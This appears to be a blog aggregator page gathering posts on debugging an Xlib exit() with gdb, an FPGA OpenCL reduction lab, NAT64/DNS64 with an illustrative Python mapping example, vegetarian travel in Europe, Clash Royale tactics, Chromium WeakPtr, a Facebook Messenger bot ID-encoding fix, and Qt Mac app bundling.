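So run it again, this time setting a breakpoint on exit in gdb before continuing.

The backtrace obtained: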

#0  __GI_exit (...) at exit.c:104
#1 0x00007fdd27f60408 in _XDefaultError (...) at ../../src/XlibInt.c:1414
#2 0x00007fdd27f6054b in _XError (...) at ../../src/XlibInt.c:1463
#3 0x00007fdd27f5d5e7 in handle_error (...) at ../../src/xcb_io.c:213
#4 0x00007fdd27f5e687 in _XReply (...) at ../../src/xcb_io.c:699
#5 0x00007fdd27f45346 in XGetWindowProperty (...) at ../../src/GetProp.c:69
#6 0x00007fdd2825db30 in XmuClientWindow () from /usr/lib/x86_64-linux-gnu/libXmu.so.6
...

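The backtrace gives little to go on; it is all third-party library code. According to the documentation of XmuClientWindow(), it may fail, but it should not call exit() directly. First find the source of XmuClientWindow and look for clues.

Finding the source with Ubuntu's package system

First use apt-file to find which package libXmu.so.6 is in (on the first run, run apt-file update first to refresh the index):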

$ apt-file search /usr/lib/x86_64-linux-gnu/libXmu.so.6
libxmu6: /usr/lib/x86_64-linux-gnu/libXmu.so.6
libxmu6: /usr/lib/x86_64-linux-gnu/libXmu.so.6.2.0
libxmu6-dbg: /usr/lib/debug/usr/lib/x86_64-linux-gnu/libXmu.so.6.2.0

Then get the source with apt-get source:

$ apt-get source libxmu6

XmuClientWindow is found in src/ClientWin.c [*1]:

Window
XmuClientWindow(Display *dpy, Window win)
{
...
XGetWindowProperty(dpy, win, WM_STATE, 0, 0, False, AnyPropertyType,
&type, &format, &nitems, &after, &data);
....
}

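Not much useful information here; go on to the code of XGetWindowProperty. From the backtrace we know it is in ../../src/GetProp.c, but I do not know which package GetProp.c belongs to. Searching Google for GetProp.c might give a clue, but here I use another approach.

Finding the source from the header

src/ClientWin.c includes few headers, only these: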

#include <X11/Xlib.h>
#include <X11/Xatom.h>

#include <X11/Xmu/WinUtil.h>

First look up the full path with locate:

$ locate X11/Xlib.h
/usr/include/X11/Xlib.h

Then find the package name with apt-file:

$ apt-file search /usr/include/X11/Xlib.h
libx11-dev: /usr/include/X11/Xlib.h

Get the source:

$ apt-get source libx11-dev

Incidentally, you can expand #include with gcc -E to verify that XGetWindowProperty really comes from X11/Xlib.h:

$ echo "#include <X11/Xlib.h>" | gcc - -E | grep XGetWindowProperty
extern int XGetWindowProperty(

With too many headers, preprocessing the source file directly is faster:

$ gcc -E src/ClientWin.c > t

The information obtained:

1674 # 1303 "/usr/include/X11/Xlib.h" 3 4
...
3060 extern int XGetWindowProperty(

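After finding the target, search backwards for the first header path; that is the origin. If it cannot be found, the include directories may be missing from the command line. The complete compile command can be obtained from make's output: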


$ ./configure
$ make V=1 | grep ClientWin.c
/bin/bash ../libtool --tag=CC --mode=compile gcc -std=gnu99 -DHAVE_CONFIG_H \
-I. -I.. -I../include -I../include/X11/Xmu < ... 略 ...> -c -o ClientWin.lo ClientWin.c
...

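Pick out the -I parts and add them to gcc's arguments along with -E to expand the includes.

For how to make make show the compile options (cflags), see here

Continuing to trace the code

In src/GetProp.c we find:

 69     if (!_XReply (dpy, (xReply *) &reply, 0, xFalse)) {

This matches the earlier backtrace: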

#0  __GI_exit (...) at exit.c:104
#1 0x00007fdd27f60408 in _XDefaultError (...) at ../../src/XlibInt.c:1414
#2 0x00007fdd27f6054b in _XError (...) at ../../src/XlibInt.c:1463
#3 0x00007fdd27f5d5e7 in handle_error (...) at ../../src/xcb_io.c:213
#4 0x00007fdd27f5e687 in _XReply (...) at ../../src/xcb_io.c:699
#5 0x00007fdd27f45346 in XGetWindowProperty (...) at ../../src/GetProp.c:69
#6 0x00007fdd2825db30 in XmuClientWindow () from /usr/lib/x86_64-linux-gnu/libXmu.so.6

which means we are looking in the right direction. Reading on through the relevant functions in src/xcb_io.c and src/XlibInt.c, we learn:

// src/XlibInt.c
1463 rtn_val = (*_XErrorFunction)(dpy, (XErrorEvent *)&event); /* upcall */

Comparing with the backtrace, executing _XErrorFunction ends up calling _XDefaultError. The code of _XDefaultError is:

1409 int _XDefaultError(
1410 Display *dpy,
1411 XErrorEvent *event)
1412 {
1413 if (_XPrintDefaultError (dpy, event, stderr) == 0) return 0;
1414 exit(1);
1415 /*NOTREACHED*/
1416 }

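This confirms that exit() is called here. So replacing _XErrorFunction solves the problem.

Searching the code for _XErrorFunction shows that it can be set with XSetErrorHandler(). That at least keeps the program from exiting.

Notes

1. You can search with grep; I use gj, which is more efficient.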

by fcamel (noreply@blogger.com) at March 08, 2017 02:01 AM

February 24, 2017

This week's workout bento

While the menu has not gone downhill yet, keeping a few more photos as a memento ...

by fcamel (noreply@blogger.com) at February 24, 2017 04:42 PM

January 27, 2017

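Yui Aragaki × Akiko Nogi

Because of We Married as a Job! (月薪嬌妻), I watched a series of Yui Aragaki's dramas. Roughly the following (some I only watched a few episodes of); my personal rating is in parentheses:

  • The Memorandum of Kyoko Okitegami (8 points)
  • We Married as a Job! (7 points)
  • Public Affairs Office in the Sky (7 points)
  • Legal High (7 points)
  • Legal High SP (7 points)
  • Code Blue (6 points)
  • Papa to Musume no Nanokakan (6 points)
  • My Boss, My Hero (6 points)

In the three most recent ones, We Married as a Job!, The Memorandum of Kyoko Okitegami and Public Affairs Office in the Sky, she plays the lead and the screenwriter is Akiko Nogi in all of them; the pairing seems to work well. Especially The Memorandum of Kyoko Okitegami, which I will probably watch again someday. Compared with the original, I think the screenwriter adapted it really well, especially by adding the café trio, which enriched the interactions between the characters a lot. The original is not finished yet, so the drama could only roughly wrap things up. Not seeing the story fully end leaves me a little unsettled.

As for acting, I think she was best in Papa to Musume no Nanokakan, We Married as a Job! and The Memorandum of Kyoko Okitegami; the goofy parts in Legal High were quite good, and the rest was so-so.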

by fcamel (noreply@blogger.com) at January 27, 2017 07:03 AM

September 21, 2016

LAB - Understand FPGA OpenCL


Goals

  • Practice with the emulation development environment
  • Understand Task (Single Work-Item) vs. NDRange
  • Understand loop pipelining
  • * Understand coalescing


Prerequisite


a. PC requirements:
  • 64-bit CPU / >4 GB DDR
  • Win7, Ubuntu 16.04 or another version
b. Installing the PC environment
  1. Obtain licenses for Quartus, Altera SDK for OpenCL and PR (Partial Reconfiguration), and set the LM_LICENSE_FILE environment variable to the license
  2. Install the Quartus II software v. 16.0 Standard Edition (including the Arria 10, Stratix V and Cyclone V device families)
    1. Please install it at c:\altera\16.0 (the scripts run later assume this; otherwise you need to modify the .bat in the test project)
  3. Download and install the Altera SDK for OpenCL version 16.0
  4. Compiler environment
    1. Windows: install the Visual C++ 2010 Express version of Microsoft Visual Studio with support for C++ from http://www.microsoft.com/visualstudio/eng/downloads.
      • The Professional version is OK if you have a license for it.
    2. Linux:
      • Use “apt-get install build-essential” to prepare the build environment
  5. If you do NOT have Visual C++ Professional
    1. Open the Programs & Features control panel in Windows 7. Manually uninstall all Microsoft Visual C++ 2010 programs that have the word “Redistributable” in them, both x64 and x86 versions
    2. Download and install Microsoft Windows SDK Version 7.1 from http://www.microsoft.com/en-us/download/details.aspx?id=8279 . This software allows the compilation of the 64-bit executables that are needed for the Altera OpenCL solution
  6. Also, you do NOT need the Intel SDK for OpenCL anymore
  7. Before the lab day, please make sure you understand the PSG OpenCL emulator mode
 



Introduction

OpenCL allows developers to write portable, high-performance code that can target all varieties of parallel processing platforms, including Intel CPUs, FPGAs and GPUs. Programming OpenCL on an FPGA is very different from programming OpenCL on GPUs. By leveraging the loop-pipelining feature, sequential execution is acceptable in many cases and gives a simple performance improvement.
This article discusses simple reductions. A reduction is a very simple operation that takes an array of data and reduces it down to a single element, for example by summing all the elements in the array. Consider this simple CPU C code, which sums all the elements in an array:
float reduce_cpu_sum(float* input, int length) {
 float accumulator = input[0];
 for(int i = 1; i < length; i++)
   accumulator += input[i];
 return accumulator;
}
This code is completely sequential! There’s no way to parallelize the loop, since every iteration of the loop depends on the iteration before it. How can we loop-pipeline it? How can we parallelize this code?
We hope all attendees will understand the NDRange and Task implementations through this hands-on lab.


Lab1 - Task and Loop-pipelined Version

CPU version

float reduce_cpu_sum(float* input, int length) {
 float accumulator = input[0];
 for(int i = 1; i < length; i++)
   accumulator += input[i];
 return accumulator;
}
Idea: in the above code, length is not known at compile time, so the compiler can’t unroll the for-loop correctly. We can divide the data into const-M parts and wrap the original for-loop in another for-loop over const-M. Each iteration handles length/const-M elements, accumulates them and saves the result into local memory. After that, we accumulate the local memory again.
Since the compiler knows const-M at compile time, it can unroll this wrapper for-loop automatically (or it can be unrolled manually).



Advanced Topics - Running on the real device.
To shorten the simulation time, DATA_N is set to a small number, 1000. Please increase this number to 1000000 and test the total performance.

Hands-on - implement the above algorithm

Advanced Topics -
  • Running on the real device.
  • Compare the performance with Lab1.


Lab2 - Loop-pipelined Version and Memory access patterns


In the previous code, to improve performance, we unrolled the level-1 for-loop. Since we have accumulators 0…M and global memory read instructions, the memory access pattern is as shown below:
The access pattern is interleaved rather than contiguous, which causes a cache penalty.
To improve cache performance and hit rate, we can change the access pattern from the one above to the one below:
Hands-on - implement the above algorithm

Advanced Topics -
  • Running on the real device.
  • Compare the performance with Lab1.


Lab3 - NDRange Version (Optional)


At the OpenCL work-group level, we’ll take advantage of associativity to break the vector into small chunks, build an independent reduction tree for each chunk, and execute them independently, in parallel. We’ll make sure each of the chunks is small enough that it fits in local memory, and then we’ll assign one work-item per element.
At each stage of the reduction tree, we’ll be loading and storing partial reductions as we compute, so it’s crucial to use local memory to communicate between work-items in the work-group. We’ll then execute the reduction tree by using a for loop in conjunction with OpenCL barriers. For example, see the following figure, which performs a min reduction to find the smallest element in a vector:




__kernel
void reduce(
           __global float* buffer,
           __local float* scratch,
           __const int length,
           __global float* result) {

 int global_index = get_global_id(0);
 int local_index = get_local_id(0);
 // Load data into local memory
 if (global_index < length) {
   scratch[local_index] = buffer[global_index];
 } else {
   // Infinity is the identity element for the min operation
   scratch[local_index] = INFINITY;
 }
 barrier(CLK_LOCAL_MEM_FENCE);
 for(int offset = get_local_size(0) / 2;
     offset > 0;
     offset >>= 1) {
   if (local_index < offset) {
     float other = scratch[local_index + offset];
     float mine = scratch[local_index];
     scratch[local_index] = (mine < other) ? mine : other;
   }
   barrier(CLK_LOCAL_MEM_FENCE);
 }

 if (local_index == 0) {
   result[get_group_id(0)] = scratch[0];
 }
}



LAB - modify the host code (opencl_main.cpp) so that the above code executes correctly.



Hint for LABs


  1. A naive, serial, task-based solution is included in the lab material. Please modify reduce.cl, follow the document and implement your version.

  2. For attendees using the Linux environment, a Makefile is ready; use “make run_emulator” to compile, execute and monitor the result.
  3. When you modify the .cl file, the .cpp and .c files do not need to be recompiled.


by maple (noreply@blogger.com) at September 21, 2016 07:13 AM

June 26, 2016

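NAT64 and DNS64

References

IPv4 addresses are running out (people have been saying so for over a decade; lately it is for real). During the transition in which the backbone and servers move to IPv6, clients have to move too, otherwise the servers were converted for nothing. But a large number of servers still use IPv4, so clients need to support both IPv4 and IPv6.

If you are a network admin and want users to be able to connect to both IPv4 and IPv6 addresses, one possible approach is to build a "pure IPv6 environment": clients always get an IPv6 address and always connect to IPv6 addresses. But for IPv6 clients to also reach IPv4 addresses, NAT64+DNS64 are needed to help.

The principle is that DNS64 looks up both the IPv6 and the IPv4 address; if there is an IPv6 address it uses that, otherwise it converts the IPv4 address into an IPv6 one, with a prefix that matches the NAT64 configuration, so that the client's packets to that IP go through the NAT64 router first. The second slide deck has a detailed flow diagram.

NAT64 then translates the IPv6 packets into IPv4 on the way out, connecting seamlessly to servers on IPv4 addresses. When the client gets a normal IPv6 address back from DNS64, traffic goes straight out through the ordinary router without passing through NAT64.

For people designing back-end servers: the more users can connect to IPv6 addresses, the more likely they are to consider using IPv6 addresses.

For app developers: be aware that some users' networks use a DNS64+NAT64 setup, so connect to your own servers by domain name; that way it works whether your servers use IPv4 or IPv6.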
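
The address mapping and the advice to connect by domain name can be seen in a few lines. The following is an added example (not part of the original post): it models the DNS64 decision, the NAT64 router's reverse mapping, and an IPv6-only client that is given either a hostname or a hard-coded IPv4 literal. The post names no prefix, so the RFC 6052 well-known prefix 64:ff9b::/96 is assumed; the zone data uses documentation addresses and, like the function names, is constructed.

```python
import ipaddress

# Assumption: the RFC 6052 well-known prefix; a deployment may use its own /96.
WELL_KNOWN_PREFIX = ipaddress.IPv6Network("64:ff9b::/96")

# Constructed zone data (documentation address ranges only).
ZONE = {
    "dual.example": {"A": ["192.0.2.10"], "AAAA": ["2001:db8::10"]},
    "legacy.example": {"A": ["192.0.2.33"], "AAAA": []},
}


def synthesize_aaaa(ipv4, prefix=WELL_KNOWN_PREFIX):
    """DNS64 side: embed an IPv4 address in the low 32 bits of a /96 prefix."""
    if prefix.prefixlen != 96:
        raise ValueError("this sketch only handles /96 prefixes")
    v4 = ipaddress.IPv4Address(ipv4)
    return ipaddress.IPv6Address(int(prefix.network_address) | int(v4))


def extract_ipv4(ipv6, prefix=WELL_KNOWN_PREFIX):
    """NAT64 side: recover the IPv4 destination, or None if not in the prefix."""
    addr = ipaddress.IPv6Address(ipv6)
    if addr not in prefix:
        return None  # native IPv6 destination: routed normally, no translation
    return ipaddress.IPv4Address(int(addr) & 0xFFFFFFFF)


def dns64_resolve(name, zone=ZONE, prefix=WELL_KNOWN_PREFIX):
    """Return native AAAA records if any exist, else synthesize them from A."""
    records = zone.get(name, {})
    if records.get("AAAA"):
        return [ipaddress.IPv6Address(a) for a in records["AAAA"]]
    return [synthesize_aaaa(a, prefix) for a in records.get("A", [])]


def client_connect_target(target, zone=ZONE):
    """What an IPv6-only client can dial for `target`, or None if unreachable.

    A hostname goes through DNS64. An IPv4 literal never reaches DNS64, so the
    client has no address it can route to.
    """
    try:
        literal = ipaddress.ip_address(target)
    except ValueError:
        answers = dns64_resolve(target, zone)
        return answers[0] if answers else None
    return literal if literal.version == 6 else None


if __name__ == "__main__":
    for target in ("dual.example", "legacy.example", "192.0.2.33"):
        dest = client_connect_target(target)
        via = extract_ipv4(dest) if dest else None
        print(f"{target:16} -> {dest} (NAT64 to {via})")
```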

by fcamel (noreply@blogger.com) at June 26, 2016 08:33 AM

June 16, 2016

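Notes on eating vegetarian in Germany, Switzerland and the Netherlands

A while ago I spent ten-odd days travelling in these countries. I normally eat vegan (called 植物五辛素 in Taiwan). Before going I checked Happy Cow a little; once there I could not be bothered with Happy Cow, and in all three countries I just searched for "vegetarian restaurant" in the Google Map app, then judged from user reviews whether vegan food was offered. As I recall, the vegetarian restaurants in all three countries offered vegan meals; some labelled them very clearly, some could provide them on request. If you do not want to research in advance, in big cities Google Map should find at least one place, and failing that, chain supermarkets also carry some vegan food.

Germany

We went to Munich, Freiburg, Frankfurt and Cologne. In Cologne we were short on time and did not eat there; elsewhere there were restaurants offering vegan food within about ten minutes by bus, but note that most restaurants are closed on Sundays.

Munich had the most choices, including restaurants open Monday through Sunday. The one we went to most was Max Pett... Das Vegane Restaurant, open until 23:00 in the evening, with many good dishes to choose from and good service (above that of the average German restaurant); the only downside is the slightly high price. Max Pett has an English menu; if you do not know what to order, you can also find dish names from the photos others have uploaded to Yelp.

Besides having more vegetarian restaurants, Munich also has Veganz, a supermarket that sells only vegan food, and Denn's Biomarket near the station has lots of vegan food, clearly labelled. Ordinary German supermarkets also carry some vegan food, such as soya milk, plant-based yogurt, salad, bread, sausages, ham and cheese; products are specifically marked vegan or veggie (vegetarian, not necessarily vegan). Eating vegetarian in Munich is really convenient. Even the breakfast at our hotel offered vegan butter, and the waiters knew what vegan means.

The photo below was taken in Denn's Biomarket; the "V" at the bottom means vegan.

The photo below is the burger my wife made with ingredients bought at Veganz, our lunch at Neuschwanstein Castle.

Switzerland

Switzerland has fewer vegetarian restaurants and products than Germany. HILTL in Zurich, billed as the world's first vegetarian restaurant (Chinese introduction), is quite amazing: open all year, from morning until the small hours, offering a pay-by-weight buffet and à la carte. There are so many dishes that our plates were overflowing and there were still many we wanted with no room left. HILTL also runs the chain tibits, likewise a buffet with very long opening hours. Both HILTL and tibits mark on each dish whether it is vegan. Some big cities such as Bern and Lucerne (Luzern) have a tibits inside the station, which is convenient.

The Netherlands

Amsterdam has several branches of the chain maoz, serving pita (?) or salad; you will run into one just walking around, and they close late (it varies by branch, 22:00 or later). There are other vegetarian places too, and the biggest supermarket chain, Albert Heijn, has some vegan food. We also went to Rotterdam, where Spirit is delicious, also a pay-by-weight buffet, with each dish marked vegan or not. We were so happy with lunch that we did not try another place for dinner and went back to Spirit.

Summary

Eating vegetarian in the big cities of all three countries is no problem. Smaller cities may have no vegetarian restaurant open on holidays, and even smaller places may have none at all (such as Zermatt and Spiez in Switzerland), so you can only buy food at the supermarket to put in bread. Note that most hotels do not provide a kettle, though you can ask the front desk for hot water. If you want to cook instant noodles or vegetables yourself, bring a travel kettle or buy one locally. If you bring your own, note that the European voltage is 220 V so a transformer is needed, and the sockets are different, so you may need a plug adapter.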

by fcamel (noreply@blogger.com) at June 16, 2016 05:40 PM

June 15, 2016

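Notes from the Europe trip - 1

I had expected my first trip to Europe to bring many insights; it turned out so-so. It suddenly occurred to me that perhaps, as Haruki Murakami said, one just records these things first. Later they slowly get sorted and filed in the mind, and someday, when needed, the insight comes.

Small things that seemed like nothing during the trip become something I miss after coming back. Perhaps because they are rare, I find myself recalling fragments of scenes from the journey, surfacing now and then.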

by fcamel (noreply@blogger.com) at June 15, 2016 08:10 PM

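Clash Royale: 3308 trophies with level 9 cards on light spending

Measured against HKES's basic recruitment requirements (highest trophies 3000/3300 = player level 8/9), I will take it as a memento XD; from here on I will probably play less and less.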

by fcamel (noreply@blogger.com) at June 15, 2016 03:30 PM

May 21, 2016

[C++] chromium WeakPtr implementation

C++11 provides weak_ptr for referring to an object managed by shared_ptr without sharing ownership with the other ref-counted pointers. Here is the basic idea of how to implement it:





      +--------------> T object <-----------------------+
      +                                                 +
    T*ptr                                             T*ptr
+---------------+  ref   +-----------------+  ref  +---------------------+
| WeakReference | +----> | Flag (ref count)| <-----+ WeakReferenceOwner  |
+---+-----------+        +----------+------+       +------+--------------+
    |                               ^                     |
    |                               +---------------------+
    |                               |  Invalidate: when last WeakReferenceOwner
    |                               |  deleted or owner want to invalidate object.
    |                               |
    +-------------------------------+

      Check Flag validate before access object

The basic idea is that we create two classes (WeakReference and WeakReferenceOwner) that share a ref-counted flag indicating whether the referenced object is still valid. Whenever you want to access the T* object, WeakReference checks the flag first and returns NULL if the flag is invalid. This avoids keeping a large amount of memory alive when the real T object is large, because only a small flag is shared.

by Yu-Teh Shen (noreply@blogger.com) at May 21, 2016 07:25 AM

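Clash Royale: reaching Arena 8 (3013 trophies) on light spending

Foreword

I did spend $590, but the money all went on buying new cards to play with (like Dark Prince and Guards..., charging together with shields looks super cool!!), which did not help much with climbing XD.

Or on upgrading decks I found hard to deal with; after playing them for a while and getting crushed by opponents, I would learn where those decks' weaknesses are XD (like Zap-Fireball Hog and Royal Giant). Also, in the match that took me over 3000 trophies the opponent stopped moving halfway through..., so otherwise I would probably have had to struggle for a while longer before reaching 3000.

Profile

Most cards are still at the level 8 tier; only Barbarians and the King Tower are at 9, but that helps defense a lot.

Since 4/16, when I watched Jason dominate the official tournament, I have been playing Jason's deck. It is very fun, balanced between offense and defense, and has no Epic cards, so it suits long-term development.

Core idea

Everyone knows that in this game playing second is advantageous (with a few exceptions such as Zap-Fireball Hog), so the key is how to use the Elixir Collector or Giant to force the opponent to move first. Gain an elixir lead through counter-attacks, then assess the situation and decide whether to push. If the opponent's defense is too solid, wait until there are two Elixir Collectors on the field before sending troops. The timing and the placement of the Giant are the key to this deck.

I almost never place the Giant behind the King Tower; that is too slow and invites a rush from the opponent. At most I place it in front of the King Tower, where it can defend against rushes like Prince or Mini P.E.K.K.A and also block splash damage from the opponent's attacking back line (such as Wizard or Baby Dragon), letting my ranged units keep dealing damage to relieve the pressure. So the Giant's level matters most, then Hog Rider. After that I think Barbarians matter more than the rest, to strengthen defense.

I almost always place the Elixir Collector at full elixir; if I am sure the opponent only attacks after building up one big push (e.g. Sparky), I will also place it early to get to my next defensive card sooner. If the Elixir Collector is the next card, I place Goblins or Archers behind the King Tower and watch what the opponent does; if there is no real threat, I place the collector at full elixir.

The Elixir Collector always goes behind the tower; only when I am ahead on score and want to turtle until time runs out do I place it a tile or two from the King Tower to bank elixir and help defend. I do not mind the opponent using spells on the collector; that means they temporarily have no spell to answer Barbarians, giving me a chance to counter-push with Barbarians. Also, the collector should not be placed in the last minute: there will not be time to collect all the stored elixir, which creates danger instead. Only place it if overtime is certain, and then do not place another during overtime.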

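Offense

Basically the Giant tanks with Goblins or Archers following; I rarely attack with Hog Rider. Without Freeze, Fireball, Zap or Poison for support, Hog Rider lacks punch and plays a supporting role in this deck. Usually after placing the Giant I add Hog Rider depending on the situation, for example to hit the other lane and split the opponent's answers, or to jump in at the centre of the bridge and take down a defensive building in the golden spot ahead of the Giant. Or when the Giant is nearly dead, I send Hog Rider in to take over as tank so the back line can keep dealing damage. Also, when I have confirmed that the opponent has no answer to Minion Horde in hand (for example, they just played Arrows and usually need to play 3 ~ 4 more cards to draw it again), Hog Rider tanking for Minion Horde can rush down a tower outright; you could call it the support finishing move!

A Giant placed in front of the King Tower reaches the bridge just as I have regained five elixir. During that time the opponent is under the pressure of sitting at full elixir without playing, and will likely play their answer to the Giant first; then I can add support cards or abandon the Giant and wait for the next wave. For example, if the opponent places an Inferno Tower first, I place Barbarians in front of the Giant to protect it, or abandon the Giant, which does not lose on elixir either. But placing the Giant directly at the bridge loses this "play second" advantage.

If I am sure the opponent has no Fireball, I can place Barbarians at the bridge and then use the Giant to split them, two in front and two behind, then add ranged units at the back.

After taking one of the opponent's towers I basically defend; if I cannot hold, I can place the Giant between the opponent's King Tower and Arena Tower followed by Minion Horde for a surprise tower trade, which also works well.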

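Defense

Barbarians are the main goalkeeper; I only use Minion Horde when I do not have them. When defending Hog Rider with Barbarians, place them at the bridge if possible, a bit further back if too late, and in front of the tower only as a last resort, because the opponent will probably Fireball the Barbarians next, and too close to the tower that costs me. And if the Barbarians go down fast enough, the Hog dies before touching the tower.

Against Royal Giant, place Barbarians at the bridge immediately; if the opponent commits more, I commit more too, adding back-line units to clear the giant faster. That way the Royal Giant gets off two or three shots and dies, and then I counter-push depending on the situation or safely place an Elixir Collector for an elixir lead. Sometimes I can also place Hog Rider at the centre of the bridge, slightly on the defending side: the opponent has just attacked and is about to add a back line when a Hog charges in, which disrupts their rhythm. The Hog has a good chance of reaching the tower. Even better if the opponent's back line is a Wizard: the Wizard shoots the Hog, the Barbarians clear the Royal Giant and carry on into the Wizard, I add Goblins behind the Barbarians, and in an exchange of 11 elixir each I come out with more damage on the Arena Tower.

Giant + Balloon is also answered by using Barbarians on the Giant; once the Giant dies the Balloon soon follows. The Balloon will get a couple of hits in, but the counter-push has a good chance of taking the opponent's tower outright. Never use Minions on the Balloon first; they will be wiped out by Arrows before finishing it.

If the opponent is just harassing with small troops, I usually ignore it and let the tower absorb the damage for an elixir lead. Occasionally Hog Rider can pull troops to relieve pressure. For example, when the opponent's Mini P.E.K.K.A reaches the middle, placing Hog Rider beside it means the Arena Tower takes no damage and the Hog gets to scout: it may touch the tower or force the opponent to spend more troops answering it. When I have no answer to Barbarians in hand, I can also place Hog Rider at the centre of the bridge to split the Barbarians, stringing the group out in a line and easing the pressure on the Arena Tower. I practiced defending with Hog Rider while practicing Zap-Fireball Hog, and it happens to be useful in this deck too.

Weaknesses

  • Vulnerable to splash damage such as Valkyrie and Wizard cutting down the back line; conversely, on defense the Giant can absorb splash attacks and then I counter-push, at which point the opponent has no good card left against my back line.
  • With no splash damage card, hut spam decks are hard to handle (it is hard to gain an elixir lead); with a bad start I can only play for a draw.
  • Decks that build one overwhelming push from the back, like Three Musketeers or Sparky, are also hard to handle. Then I can only try a Hog Rider rush on the other lane and see whether the opponent overspends defending it. If the opponent spends little and concentrates on one lane, all I can do is place the Giant after they cross the bridge to tank the fire, then Barbarians or Minion Horde to cut down the back line; the margin for error is small, and one stuck hand that leaves me short of elixir means defeat.
  • Ice Wizard is super OP; with it on the field I cannot really break through and can only attack the other lane, with low odds. I do not know how top players handle Ice Wizard.

Other

Finally, the battle log as a memento: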

by fcamel (noreply@blogger.com) at May 21, 2016 06:56 AM

May 17, 2016

“(#100) No matching user found” - Facebook Messenger Bot Bug

On May 13th, I found that my Facebook Messenger bot failed to respond to some users, and when I read the error log of my webhook process, I got something like:
"error": {
    "message": "(#100) No matching user found",
    "type": "OAuthException",
    "code": 100,
    "fbtrace_id": "XXXXXXXXXXX"
}

Some Backgrounds

At this point, Facebook Messenger Bot is still new, so it is reasonable for it to have some bugs. I’m using Node.js for my webhook on Heroku, and I followed the tutorial provided by Facebook for setting up the bot.

Why?

Soon, I found that this bug is discussed on the Facebook bug page here. The problem is that Facebook decided to switch their encoding to use strings instead of ints for user & page IDs, which made the example code (template code) on the official Facebook tutorial page fail to respond to users with string IDs.

Then?

Facebook sent out notifications to app developers saying:
On Tue May 17 format of user and page ids delivered via webhooks will change from an int to a string to better support default json encoder in js (that trims long ints). Please make sure your app works with string ids returned from webhooks as well as with ints.

Solution

I believe that Facebook will make the original code in the tutorial work pretty soon; however, there are people providing the solution online already. Here’s the template code that should work:
var express = require('express');
var bodyParser = require('body-parser');
var request = require('request');
// json-bigint parses integers that are too large for a JS number without losing digits
const JSONbig = require('json-bigint');

var app = express();

app.set('port', (process.env.PORT || 5000));

app.use(express.static(__dirname + '/public'));
// Keep the request body as raw text so it can be parsed with JSONbig instead of JSON.parse
app.use(bodyParser.text({ type: 'application/json' }));

app.listen(app.get('port'), function() {
  console.log('Node app is running on port', app.get('port'));
});

// Page access token placeholder; keep the real token out of source control
var token = "<YOUR_TOKEN_HERE>";

// Send a text reply to the given user id through the Send API
function sendTextMessage(sender, text) {
  var messageData = {
    text: text
  };
  request({
    url: 'https://graph.facebook.com/v2.6/me/messages',
    qs: { access_token: token },
    method: 'POST',
    json: {
      recipient: { id: sender },
      message: messageData
    }
  }, function(error, response, body) {
    if (error) {
      console.log('Error sending message: ', error);
    } else if (response.body.error) {
      console.log('Error: ', response.body.error);
    }
  });
}

app.post('/webhook/', function (req, res) {
  // Parse with JSONbig so an id delivered as a long int keeps every digit
  var data = JSONbig.parse(req.body);
  var messaging_events = data.entry[0].messaging;

  for (var i = 0; i < messaging_events.length; i++) {
    var event = messaging_events[i];
    // Works for both formats: ids delivered as ints and ids delivered as strings
    var sender = event.sender.id.toString();

    if (event.message && event.message.text) {
      var text = event.message.text;
      sendTextMessage(sender, text);
    }
  }

  res.sendStatus(200);
});
Make sure you’ve added body-parser, express, json-bigint, and request to your npm dependencies.
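The failure mode behind the notification quoted above ("default json encoder in js (that trims long ints)") can be reproduced without any dependency. The following is an added example, not code from the original post or from Facebook's tutorial; the webhook body is constructed and the function names are hypothetical. It shows JSON.parse silently changing a long integer ID and one way to keep every digit by quoting unsafe integers before parsing.

```javascript
'use strict';

// Constructed sample webhook body (not a real capture). The sender id is a
// bare 17-digit integer, above Number.MAX_SAFE_INTEGER (9007199254740991).
const SAMPLE_BODY =
  '{"object":"page","entry":[{"id":12345,"messaging":[{"sender":' +
  '{"id":10154012345678901},"message":{"text":"id 10154012345678901 \\"ok\\""}}]}]}';

// Wrap every bare integer literal that a JS number cannot hold exactly in
// quotes, so JSON.parse returns it as a string. String contents are copied as-is.
function quoteUnsafeIntegers(jsonText) {
  let out = '';
  let i = 0;
  let inString = false;
  while (i < jsonText.length) {
    const ch = jsonText[i];
    if (inString) {
      if (ch === '\\' && i + 1 < jsonText.length) {
        out += ch + jsonText[i + 1]; // keep escape sequences intact
        i += 2;
        continue;
      }
      if (ch === '"') inString = false;
      out += ch;
      i += 1;
    } else if (ch === '"') {
      inString = true;
      out += ch;
      i += 1;
    } else if (ch === '-' || (ch >= '0' && ch <= '9')) {
      // Consume the whole number token, then decide whether it is safe.
      let j = i + 1;
      while (j < jsonText.length && /[0-9.eE+-]/.test(jsonText[j])) j += 1;
      const token = jsonText.slice(i, j);
      const unsafe = /^-?\d+$/.test(token) && !Number.isSafeInteger(Number(token));
      out += unsafe ? '"' + token + '"' : token;
      i = j;
    } else {
      out += ch;
      i += 1;
    }
  }
  return out;
}

// Collect sender ids as strings, whichever format they were delivered in.
function collectSenderIds(data) {
  const ids = [];
  for (const entry of data.entry || []) {
    for (const event of entry.messaging || []) {
      if (event.sender && event.sender.id !== undefined) {
        ids.push(String(event.sender.id));
      }
    }
  }
  return ids;
}

// Plain JSON.parse: the long integer id is rounded before the code ever sees it.
function naiveSenderIds(rawBody) {
  return collectSenderIds(JSON.parse(rawBody));
}

// Quote unsafe integers first: the id survives digit for digit.
function safeSenderIds(rawBody) {
  return collectSenderIds(JSON.parse(quoteUnsafeIntegers(rawBody)));
}

console.log('naive:', naiveSenderIds(SAMPLE_BODY));
console.log('safe: ', safeSenderIds(SAMPLE_BODY));
```

A rounded ID is still a syntactically valid ID, so the reply is addressed to a user that does not exist or, worse, to a different one; treating IDs as opaque strings end to end avoids both.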

Finally

My bot, Ducky, is now working well and is public; please feel free to message him here: http://m.me/ducky.bot!


by Heron Yang (noreply@blogger.com) at May 17, 2016 07:38 AM

May 05, 2016

Qt Mac Application Failed to Create Self-contained App Bundle (Qt Creator Build)

Recently, I encountered a problem in creating an app bundle using Qt Creator with Qt 5.6, so I posted my question in detail on StackOverflow here.

In this post, I am going to point out the places where I went wrong, along with some of my study notes.

Scott

Scott has been a friend of mine for years, and he is the best programmer I’ve ever met in Taiwan. He helped me with this question, and I would like to quote his words here:

Do try to figure out what you did wrong before. Look at the RPATH, install names etc in your executable and update your StackOverflow question with those findings. Finding out what you did wrong is an important step in understanding a system. This makes your exercise of publishing apps on multiple platforms more meaningful.

@executable_path, @loader_path, @rpath

The first reason I couldn’t build the app bundle is that I didn’t fully understand the path names used on Mac, and here is my study of @executable_path, @loader_path, and @rpath.

  • @executable_path: the folder path of the application’s executable
